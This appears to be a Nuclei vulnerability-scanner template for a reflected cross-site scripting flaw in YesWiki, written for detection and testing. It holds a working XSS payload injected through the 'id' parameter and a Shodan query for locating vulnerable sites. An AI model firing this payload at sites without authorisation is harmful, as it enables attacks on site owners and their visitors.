nuclei-templates/vulnerabilities/other/yeswiki-xss.yaml

38 lines
907 B
YAML

id: yeswiki-xss
info:
name: yeswiki/yeswiki - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
YesWiki before 2022-07-07 allows Reflected Cross-site Scripting via the "id" parameter in the AccueiL URL.
reference:
- https://huntr.dev/bounties/de4db96c-2717-4c0e-b7aa-eee756ca19d3/
metadata:
verified: true
shodan-query: http.html:"yeswiki"
tags: yeswiki,unauth,huntr,cve,cve2022,xss
requests:
- method: GET
path:
- '{{BaseURL}}/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "Query failed:"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200